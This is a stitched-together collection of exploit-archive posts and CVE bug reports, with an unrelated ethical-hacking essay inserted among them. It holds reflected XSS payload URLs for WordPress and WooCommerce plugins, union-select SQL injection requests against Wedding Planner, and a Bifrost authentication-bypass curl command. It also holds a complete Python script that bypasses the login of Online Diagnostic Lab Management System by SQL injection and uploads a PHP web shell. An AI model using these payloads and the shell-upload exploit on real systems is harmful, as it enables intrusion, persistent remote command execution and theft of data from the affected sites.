WordPress Forym plugin version 1.5.7 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : forym.xyz                                                                  ││  Vendor   : codecanyon.net                                                             ││  Software : Forym 1.5.7 - Modern Discussion Forum for Wordpress                        ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 's' is vulnerable to XSShttps://forym.xyz/?s=ax0zq%22%3e%3cscript%3ealert(1)%3c%2fscript%3efkdbh[-] Done

WordPress Forym 1.5.7 Cross Site Scripting

WordPress Sabai Discuss plugin version 1.4.13 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : sabaidiscuss.com                                                           ││  Vendor   : Sabai Discuss                                                              ││  Software : Sabai Discuss - Q&A forum plugin V1.4.13 for WordPress                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'field_number[min]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[min]=33lnoiy%22%3e%3cscript%3ealert(1)%3c%2fscript%3epfucnGET parameter 'field_number[max]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[max]=33lnoiy%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3EpfucnGET parameter 'field_range[min]' is vulnerable to XSS https://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[min]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zmGET parameter 'field_range[max]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[max]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zm[-] Done

WordPress Sabai Discuss 1.4.13 Cross Site Scripting

Online Diagnostic Lab Management System version 1.0 remote exploit that bypasses login with SQL injection and then uploads a shell.

    # Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)# Google Dork: N/A# Date: 2022-9-23# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# Authentication Required: bypass login with sql injection #/usr/bin/python3 import requests import osimport sysimport timeimport random# clean screenos.system("cls")os.system("clear")logo = '''###################################################################                                                                #  #    Exploit Script ( Online Diagnostic Lab Management System )  ##                                                                ###################################################################'''print(logo)url = str(input("Enter website url : "))username = ("' OR 1=1-- -")password = ("test")req = requests.Session()target = url+"/diagnostic/login.php"data = {'username':username,'password':password}website = req.post(target,data=data)files = open("rev.php","w")payload = "<?php system($_GET['cmd']);?>"files.write(payload)files.close()hash = random.getrandbits(128)name_file = str(hash)+".php"if "Login Successfully" in website.text:        print("[+] Login Successfully")    website_1 = url+"/diagnostic/php_action/createOrder.php"    upload_file = {         "orderDate": (None,""),        "clientName": (None,""),        "clientContact" : (None,""),        "productName[]" : (None,""),        "rateValue[]" : (None,""),        "quantity[]" : (None,""),        "totalValue[]" : (None,""),        "subTotalValue" : (None,""),        "totalAmountValue" : (None,""),        "discount" : (None,""),        "grandTotalValue" : (None,""),        "gstn" : (None,""),        "vatValue" : (None,""),        "paid" : (None,""),        "dueValue" : (None,""),        "paymentType" : (None,""),        "paymentStatus" : (None,""),        "paymentPlace" : (None,""),        "productImage" : (name_file,open("rev.php","rb"))        }     up = req.post(website_1,files=upload_file)    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")else:     print("[-] Check username or password")

Online Diagnostic Lab Management System 1.0 SQL Injection / Shell Upload

WooCommerce plugin BRW Booking Rental version 1.3.1 from Ovatheme suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : Ovatheme.com                                                               ││  Vendor   : Ovatheme                                                                   ││  Software : BRW - Booking Rental 1.3.1 Plugin WooCommerce                              ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'ovabrw_pickup_date' is vulnerable to XSShttps://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=[XSS]&ovabrw_pickoff_date=&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=productGET parameter 'ovabrw_pickoff_date' is vulnerable to XSShttps://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=&ovabrw_pickoff_date=[XSS]&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=productSome XSS Payloads Reflectedbbb4l%22%20onfocus%3dalert(1)%20autofocus%3d%20q9s9yne503%22%20onfocus%3dalert(1)%20autofocus%3d%20sg1gu[-] Done

WooCommerce BRW Booking Rental 1.3.1 Cross Site Scripting

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /wedding_details.php.

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: JunyuChen

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/wedding\_details.php?id=

Vulnerability location: /Wedding-Management-PHP/wedding\_details.php?id=, id

\[+\] Payload: /Wedding-Management-PHP/wedding\_details.php?id=-62%20union%20select%201,2,3,4,5,6,7,database(),9,10--+

dbname = dbwedding

GET /Wedding\-Management\-PHP/wedding\_details.php?id\=\-62%20union%20select%201,2,3,4,5,6,7,database(),9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40483: Bug_report/SQLi-1.md at main · Geoduck-CNN/Bug_report

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /package_detail.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: JunyuChen

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/package\_detail.php?id=

Vulnerability location: /Wedding-Management-PHP/package\_detail.php?id=, id

\[+\] Payload: /Wedding-Management-PHP/package\_detail.php?id=-5%20union%20select%201,database(),3,4--+

dbname = dbwedding

GET /Wedding\-Management\-PHP/package\_detail.php?id\=\-5%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40485: Bug_report/SQLi-3.md at main · Geoduck-CNN/Bug_report

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the booking parameter at /admin/client_edit.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: JunyuChen

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/client\_edit.php?booking=

Vulnerability location: /Wedding-Management-PHP/admin/client\_edit.php?booking=, booking

\[+\] Payload: /Wedding-Management-PHP/admin/client\_edit.php?booking=-33%20union%20select%201,2,3,4,5,database(),7,8--+&user\_id=33

dbname = dbwedding

GET /Wedding\-Management\-PHP/admin/client\_edit.php?booking\=\-33%20union%20select%201,2,3,4,5,database(),7,8\--+&user\_id=33 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40484: Bug_report/SQLi-2.md at main · Geoduck-CNN/Bug_report

Bifrost is a middleware package which can synchronize MySQL/MariaDB binlog data to other types of databases. Versions 1.8.6-release and prior are vulnerable to authentication bypass when using HTTP basic authentication. This may allow group members who only have read permissions to write requests when they are normally forbidden from doing so. Version 1.8.7-release contains a patch. There are currently no known workarounds.

**Version:**

*   Bifrost Version: v1.8.5
*   Os Version: CentOS Linux release 7.7.1908

**Describe the bug**  
monitor Group only have the read permission use Cookie authentication  
If we do write requests, it will forbidden

POST /user/update HTTP/2
Host: 10.134.88.145:21036
Cookie: xgo\_cookie=FHSkwpKqJKFTD1eBfQamigKZriYvovGgr-uoTmWNo-U%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: https://10.134.88.145:21036
Referer: https://10.134.88.145:21036/user/index
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"UserName":"evil\_admin","Password":"passwd","Group":"administrator","Host":""}

response

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 71
Date: Wed, 14 Sep 2022 03:32:50 GMT

{"status":\-1,"msg":"user group : \[ monitor \] no authority","data":null}

If we use HTTP basic authentication, we can bypass it

curl -u tari:tari -k -X POST -H "Content-Type: application/json" https://10.134.88.145:21036/user/update -d '{"UserName":"evil\_admin","Password":"passwd","Group":"administrator","Host":""}'

response

{"status":1,"msg":"success","data":null}

**Expected behavior**  
If we do a write action request use a monitor Group role with HTTP basic authentication, it also should have forbidden

**Additional context**  
The problem code is in https://github.com/brokercap/Bifrost/blob/master/admin/controller/common.go#L46  
if we use basic authentication, it will not check checkWriteRequest

CVE-2022-39219: Use basic auth can bypass write permission limit · Issue #200 · brokercap/Bifrost

For white hats who play by the rules, here are several ethical tenets to consider.

Earlier this year when international cyber-gang Lapsus$ attacked major tech brands including Samsung, Microsoft, Nvidia and password manager Okta, an ethical line seemed to have been crossed for many cybercriminals.

Even by their murky standards, the extent of the breach, the disruption caused, and the profile of the businesses involved was just too much. So, the cybercrime community came together to punish Lapsus$ by leaking information on the group, a move that ultimately led to their arrest and breakup.

So maybe there's honor amongst thieves after all? Now, don't get me wrong; this isn't a pat on the back for cybercriminals, but it does indicate that at least some professional code is being followed.

Which raises a question for the wider law-abiding hacking community: Should we have our own ethical code of conduct? And if so, what might that look like?

**What Is Ethical Hacking?**

 First let's define ethical hacking. It is the process of assessing a computer system, network, infrastructure, or application with good intentions, to find vulnerabilities and security flaws that developers might have overlooked. Essentially, it's finding the weak spots before the bad guys do and alerting the organization, so it can avoid any big reputational or financial loss.

Ethical hacking requires, at a bare minimum, the knowledge and permission of the business or organization which is the subject of your attempted infiltration.

Here are five other guiding principles for activity to be considered ethical hacking.

**Hack To Secure**

An ethical and white-hat hacker coming to assess the security of any company will look for vulnerabilities, not only in the system but also in the reporting and information handling processes. The goal these hackers is to discover vulnerabilities, provide detailed insights, and make recommendations for building a secure environment. Ultimately, they're looking to make the organization more secure.

**Hack Responsibly**

Hackers must ensure they have permission, outlining clearly the extent of access the company is giving, as well as the scope of the work they are doing. This is very important. Target knowledge, and a clear scope, help prevent any accidental compromises and establish solid lines of communication if the hacker uncovers anything alarming. Responsibility, timely communication, and openness are vital ethical principles to abide by, and clearly distinguish a hacker from a cybercriminal and from the rest of the security team.

**Document Everything**

All good hackers keep detailed notes of everything they do during an assessment and log all command and tool output. First and foremost, this is to protect themselves. For example, if an issue occurs during a penetration test, the employer will look to the hacker first. Having a timestamped log of the activities performed, be it exploiting a system or scanning for malware, gives piece of mind to organizations by reminding them that hackers work with them, not against them.

Good notes uphold the ethical and legal side of things; they are also the basis of the report hackers will produce, even when there are no major findings. The notes will allow them to highlight the issues they have identified, the steps needed to reproduce the issues, and detailed suggestions on how to fix them.

**Keep Communications Active**

Open and timely communications should be clearly defined in the contract. Staying in communication throughout an assessment is key. Good practice is to always notify when assessments are running; a daily email with the assessment run times is vital.

While the hacker might not need to report all the vulnerabilities they find immediately to their client contact, they still should flag any critical, show-stopping flaw during an external penetration test. This could be an exploitable unauthenticated RCE or SQLi, a malicious code execution, or sensitive data disclosure vulnerability. When encountering these, hackers stop testing, issue a written vulnerability notification via email, and follow up with a phone call. This gives teams on the business side the chance to pause and fix the issue immediately if they choose. It's irresponsible to let a flaw of this magnitude go unflagged until the report is issued weeks later.

Hackers should keep their main points of contact aware of their progress and any major issues they discover as they proceed. This ensures everyone is aware of any issues ahead of the final report.

**Have a Hacker Mindset**

The term hacking was used even before information security grew in importance. It just means to use things in unintended ways. For this, hackers first seek to understand all the intended use cases of a system and take into consideration all its components.

Hackers must keep developing this mindset and never stop learning. This allows them to think both from a defensive and an offensive perspective and is useful when looking at something you have never experienced before. By creating best practices, understanding the target, and creating attack paths, a hacker can deliver amazing results.

Should Hacking Have a Code of Conduct?

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/select.php.

Permalink

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: shark007

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/select.php

Vulnerability location: /Wedding-Management-PHP/admin/select.php&id

\[+\] Payload: id=-1 union select 1,2,database(),4--+

dbname = dbwedding

POST /Wedding\-Management\-PHP/admin/select.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
id=-1 union select 1,2,database(),4--+

Tag

#sql